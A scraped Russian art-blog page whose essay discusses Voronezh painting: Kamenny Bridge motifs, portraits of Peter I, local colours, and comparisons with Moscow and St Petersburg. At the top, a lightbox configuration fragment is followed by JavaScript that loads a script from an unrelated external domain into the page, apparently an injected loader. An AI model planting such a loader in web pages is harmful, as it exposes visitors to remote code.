, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Живопись Воронежа

Автор: Дмитрий Алмазов | 12 Фев 2014

Живопись Воронежа Каменный мостДавайте поговорим об особенностях воронежской живописи.

Летом в нашем городе оживают вернисажи. Воронежские художники готовятся целый сезон... Но что мы в итоги видим? Практически у каждого мастера имеется несколько полотен с Каменным мостом. Мосты - это вечный лейтмотив всех художников.

Давайте познакомься с Каменным поближе? Сначала мы увидим его на полотнах «зимнем», с пастельным красками мороза и льда. А вот уже на другом холсте яркий, цветущий, летний. Взгляд перелетает на третий этюд: мост грустный и туманный. Осенний мост... Заметили? Нет весеннего моста. Как-то не любят его творцы... Зато есть весенний Чернавский мост, который как большая чайка с распахнутыми крыльями. Не летний и  не осенний Чернавский, а вот только весенний! Хотя и Чернавский по градации больше элегантного Каменного моста, все-таки он уступает своему маленькую другу в шарме, самобытности и теплоте.

Конечно, с Каменным мостом у многих связана своя история... У художников она экспрессивная, с тремя видами: акварельная, этюдная и масляная. Акварельная экспрессия - выражается у наших мастеров в летнем периоде. Голубые и зеленые тона, эклектика форм и легкостью бытия. Этюдная экспрессия - скупость красок, праздничная меланхолия, которая отображается в зимнем периоде. Масляная экспрессия - благородные цвета, помпезные фактура и ослепительный блеск четко характеризует осенний период... Каждый период по-своему прекрасен! Но какой будет идеален,  выбирать только вам!

Еще одной особенностью воронежской живописи являются картины с Петром 1.

Многообразие «Медного всадника» с каждым днем увеличивается. Главный герой является на полотнах и смелым футуристом, и красочным арлекином.  С первым русский императором  имеют дело молодые творцы и мэтры. Обычно, юные художники делают Петра броским, сильным, напористым. Мэтры стараются сделать его чувственным, реалистичным. Но сходятся художники в одном: главный герой полотен – великая личность. Одним своим, Петр – самая многоликая фигура с воронежских картин.

Я забыла упомянуть про цвета. Наверное, многие обращали внимание, что у наших картин, они не такие, как все? Действительно наши творцы создают абсолютные новые цвета. Во многих работах преобладает «воронежский красный» ( цвет на стыке алого и бордового), «воронежский зеленый» (темно-салатовый) и «воронежский золотой» ( цвет оливкового дерева).

Давайте сравним со столичными красками? Я часто живу в столице и замечаю, что в Москве царствуют холодные, северные тона. Московские картины, как ледяные парсуны, великие и странные. У москвичей только красочные мосты: Бородинский, Большой Каменный, Москворецкий и другие. Опять же повторюсь, что мосты – самая популярная тема у художников. Кстати, вспомните Дворцовый мост в Северной Пальмире? Впечатляет? Санкт-Петербург – красивый город. И мосты под стать северной столице.

Но какие они на картинах? Помните? Дворцовый - одинокий странник белой ночи, выполненный в привычных синих, бежевых и желтых красках. Троицкий – зеленый, броский господин с безумными французскими фонарями…  Но все эти мосты чужды воронежскому сердцу, лучше любимый Каменный мост в осенней листве.

Автор Алла Битюцкая.

Заказать картины видов Воронежа в подарок или для интерьера Вы можете по телефону 8(960)134-46-27 или через раздел контакты.

Темы: Арт Воронеж, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress